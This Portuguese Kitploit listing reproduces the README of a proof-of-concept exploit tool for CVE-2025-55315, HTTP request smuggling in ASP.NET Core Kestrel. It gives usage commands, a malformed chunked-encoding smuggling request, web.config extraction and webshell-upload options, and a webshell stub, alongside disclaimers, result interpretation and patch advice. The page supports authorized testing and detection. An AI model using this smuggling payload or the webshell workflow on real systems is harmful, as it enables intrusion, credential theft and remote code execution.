Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55315-PoC-Exploit — Exploit de PoC do CVE-2025-55315 | Kitploit
Ferramentas/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

Exploit de PoC do CVE-2025-55315

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
85há 9 mesesAinda não revisado

Ferramenta de Pentest para CVE-2025-55315

Ferramenta de Exploração de Contrabando de Requisições HTTP para ASP.NET Core Kestrel

Python Version CVE CVSS License


⚠️ AVISO LEGAL

ESTA FERRAMENTA É APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS!

  • Use SOMENTE em sistemas que você possui ou para os quais tenha autorização escrita explícita para testar
  • Acesso não autorizado a sistemas de computador é ILEGAL
  • O criador da ferramenta NÃO é responsável pelo uso indevido
  • Ao usar esta ferramenta, você aceita total responsabilidade legal

📋 Visão Geral

Ferramenta profissional de teste de penetração para CVE-2025-55315 (vulnerabilidade de contrabando de requisições HTTP no ASP.NET Core Kestrel). Esta ferramenta foi projetada para análise de alvo único com capacidades abrangentes de exploração.

O que é a CVE-2025-55315?

Uma vulnerabilidade crítica de contrabando de requisições HTTP no servidor web ASP.NET Core Kestrel (CVSS 9.9/10) que permite que atacantes:

  • Contornem a autenticação
  • Roubem credenciais e tokens de sessão
  • Executem Server-Side Request Forgery (SSRF)
  • Envenenem caches
  • Façam upload de webshells e obtenham execução remota de código

Versões Afetadas:

  • .NET Core 3.0 até .NET 9.0.9
  • Corrigido em: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

✨ Recursos

Capacidades Principais

  • ✅ Análise de Alvo Único - Teste de penetração focado em um alvo específico
  • ✅ Descoberta Automática de Endpoints - Descobre endpoints comuns do ASP.NET Core
  • ✅ Teste Manual de Endpoints - Testa endpoints específicos de interesse
  • ✅ Detecção de Vulnerabilidades - Detecção precisa da CVE-2025-55315
  • ✅ Extração de web.config - Lê arquivos de configuração via contrabando de requisições
  • ✅ Upload de Webshell - Capacidade opcional de implantação de webshell
  • ✅ Relatórios Detalhados - Relatórios em formato JSON e texto
  • ✅ Recursos de Segurança - Múltiplas solicitações de confirmação para ações destrutivas

Recursos Técnicos

  • Suporte a HTTP/1.1 e HTTPS
  • Suporte a portas personalizadas
  • Timeouts configuráveis
  • Modo de depuração verboso
  • Saída de terminal com código de cores
  • Ignorar validação de certificado SSL (para testes)

🔧 Instalação

Requisitos

root@kitploit:~
# Python 3.7 or higher
python3 --version

# No external dependencies - uses only standard library

Download

root@kitploit:~
# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# Make executable
chmod +x cve_2025_55315_PoC.py

🚀 Início Rápido

Verificação Básica de Vulnerabilidade

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com

Isso irá:

  1. Coletar informações do servidor
  2. Descobrir automaticamente endpoints ativos
  3. Testar cada endpoint para a CVE-2025-55315
  4. Exibir resultados no terminal

Testar Endpoint Específico

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com -e /api/login

Verificação Completa com Extração de web.config

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

Avançado: Exploração Completa (Somente Autorizado!)

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 Exemplos de Uso

Exemplo 1: Verificação Rápida

Cenário: Verificar se o servidor de produção está vulnerável

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com

Duração Esperada: 30-60 segundos


Exemplo 2: Verificação Detalhada

Cenário: Verificação abrangente de endpoints com saída verbosa

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

Duração Esperada: 2-5 minutos


Exemplo 3: Testar Múltiplos Endpoints

Cenário: Testar endpoints críticos específicos

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

Exemplo 4: Destino Sem SSL

Cenário: Testar servidor HTTP interno

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 Opções de Linha de Comando

root@kitploit:~
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

Required Arguments:
  -t, --target         Target hostname or URL (e.g., target.com)

Optional Arguments:
  -p, --port           Port number (default: 443 for SSL, 80 for non-SSL)
  -e, --endpoint       Specific endpoint(s) to test (can be used multiple times)
  --no-ssl             Disable SSL/HTTPS (use HTTP)
  --read-config        Attempt to read web.config file
  --upload-shell       Attempt webshell upload (requires confirmation)
  -o, --output         Save report to file
  -v, --verbose        Enable verbose output
  --timeout            Socket timeout in seconds (default: 10)
  -h, --help           Show help message

🔍 Entendendo a Saída

Exemplo de Sistema Vulnerável

root@kitploit:~
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

Interpretação:

  • 🔴 VULNERABILIDADE CRÍTICA DETECTADA
  • 🔴 Múltiplos endpoints estão vulneráveis
  • 🔴 O arquivo de configuração foi extraído com sucesso
  • ⚡ URGENTE: Atualize para .NET 8.0.21+ ou 9.0.10+

Exemplo de Sistema Seguro

root@kitploit:~
Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

Interpretação:

  • ✅ O SISTEMA ESTÁ SEGURO
  • ✅ Executando versão corrigida do Kestrel
  • ✅ Todas as requisições malformadas foram rejeitadas

🛡️ Segurança e Ética

Lista de Verificação de Autorização

Antes de executar esta ferramenta, certifique-se de que:

  • Você possui o sistema alvo, OU
  • Você tem autorização por escrito para testar, E
  • A equipe de segurança foi notificada, E
  • Você tem um plano de reversão, E
  • Você entende as implicações legais

Recursos de Segurança Embutidos

  1. Confirmação em duas etapas - A ferramenta solicita autorização antes de iniciar
  2. Confirmação de upload de webshell - Requer digitar "YES" em letras maiúsculas
  3. Limitação de taxa - Atrasos entre requisições durante a descoberta automática
  4. Proteção por timeout - Evita conexões pendentes
  5. Registro detalhado - Todas as ações são registradas para trilha de auditoria

🔬 Detalhes Técnicos

Técnica de Exploração

A ferramenta explora a CVE-2025-55315 usando codificação de transferência em blocos (chunked) malformada:

root@kitploit:~
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← This becomes a separate request
Host: target.com

Por Que Isso Funciona:

  1. Servidor proxy vê \n como terminador de linha → processa como uma única requisição
  2. Kestrel (vulnerável) ignora \n → trata o GET contrabandeado como requisição separada
  3. A requisição contrabandeada pode ser executada no contexto de sessão de outro usuário

Lógica de Detecção


🐛 Solução de Problemas

Falha na Conexão

root@kitploit:~
[ERROR] Connection failed: [Errno 111] Connection refused

Soluções:

  • Verifique se o alvo está acessível: ping target.com
  • Verifique se o número da porta está correto
  • Tente com/sem SSL: --no-ssl
  • Verifique as regras de firewall

Erro de Certificado SSL

root@kitploit:~
[ERROR] Connection failed: certificate verify failed

Solução: A ferramenta já desabilita a verificação de certificados. Se o problema persistir:

root@kitploit:~
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com

Erros de Timeout

root@kitploit:~
[WARNING] No response - possible timeout

Soluções:

  • Aumente o timeout: --timeout 30
  • Verifique a conectividade de rede
  • O alvo pode estar lento ou sobrecarregado

Upload Bloqueado

root@kitploit:~
[WARNING] Upload blocked (forbidden/method not allowed)

Explicação:

  • A configuração do servidor bloqueia métodos PUT/POST
  • O WAF/IPS está bloqueando o upload
  • As permissões de arquivo impedem gravações

Isso é normal - nem todos os sistemas vulneráveis permitem upload de arquivos.


📚 Referências

Recursos da CVE-2025-55315

  1. Comunicado de Segurança da Microsoft: https://github.com/dotnet/aspnetcore/issues/64033

  2. Banco de Dados NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55315

  3. Pesquisa da Praetorian ($10k de Bug Bounty): https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

  4. Análise Técnica de Andrew Lock: https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/

Contrabando de Requisições HTTP

  1. Pesquisa da PortSwigger: https://portswigger.net/web-security/request-smuggling

  2. OWASP: https://owasp.org/www-community/attacks/HTTP_Request_Smuggling


🔄 Personalização

Adicionar Endpoints Personalizados

Edite COMMON_ENDPOINTS no script:

root@kitploit:~
COMMON_ENDPOINTS = [
    '/your/custom/endpoint',
    '/api/myapp/admin',
    # Add your endpoints here
]

Usar Webshell Personalizado

Modifique o método upload_webshell():

root@kitploit:~
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
                   shell_content: str = None):
    if not shell_content:
        shell_content = '''
        <!-- Your custom ASPX webshell here -->
        '''

📝 Relatando Problemas

Se você encontrar bugs ou tiver sugestões:

  1. Execute com o modo verboso: -v
  2. Salve a saída completa: -o debug.txt
  3. Inclua:
    • Versão do Python
    • Comando utilizado
    • Mensagem de erro
    • Comportamento esperado vs. real

⚖️ Aviso Legal

root@kitploit:~
THIS TOOL IS PROVIDED "AS IS" FOR EDUCATIONAL AND AUTHORIZED
SECURITY TESTING PURPOSES ONLY.

THE AUTHOR(S):
❌ Do NOT endorse illegal activities
❌ Are NOT responsible for misuse
❌ Are NOT liable for any damages
❌ Do NOT provide legal advice

BY USING THIS TOOL YOU AGREE:
✅ To use only on authorized systems
✅ To accept full legal responsibility
✅ To comply with all applicable laws
✅ To follow ethical hacking principles

UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL!

🎓 Propósito Educacional

Esta ferramenta foi criada para:

  • Pesquisadores de segurança
  • Testadores de penetração
  • Caçadores de bug bounty
  • Administradores de sistemas
  • Treinamento de conscientização em segurança
  • Avaliações de segurança autorizadas

NÃO para:

  • Ataques maliciosos
  • Acesso não autorizado
  • Reconhecimento competitivo
  • Qualquer atividade ilegal

🙏 Agradecimentos

  • Microsoft Security Response Center - Pela divulgação da CVE e pelas correções
  • Praetorian Security - Pela pesquisa original da vulnerabilidade
  • Andrew Lock - Pela análise técnica detalhada
  • Comunidade de segurança - Pelas práticas de divulgação responsável

📄 Licença

Apenas para Testes de Segurança Educacionais e Autorizados

Esta ferramenta é fornecida para fins educacionais e testes de segurança autorizados. O uso comercial, a redistribuição ou o uso para fins maliciosos são estritamente proibidos.


🔐 Aviso Final

root@kitploit:~
╔═════════════════════════════════════════════════════════════╗
║                                                             ║
║  USE THIS TOOL RESPONSIBLY AND LEGALLY!                     ║
║                                                             ║
║  Unauthorized access to computer systems is a CRIME.        ║
║  Always obtain written permission before testing.           ║
║  Follow responsible disclosure practices.                   ║
║                                                             ║
║  Happy (Legal) Hacking!                                     ║
║                                                             ║
╚═════════════════════════════════════════════════════════════╝

Baixar ferramenta
Resposta do ServidorInterpretaçãoStatus
400 Bad RequestKestrel rejeitou o bloco malformado✅ Seguro (corrigido)
Múltiplas respostas HTTP/1.1Duas respostas separadas recebidas❌ Vulnerável
500 ou 502Erro interno do servidor⚠️ Provavelmente vulnerável
200 OK normalRequisição aceita⚠️ Inconclusivo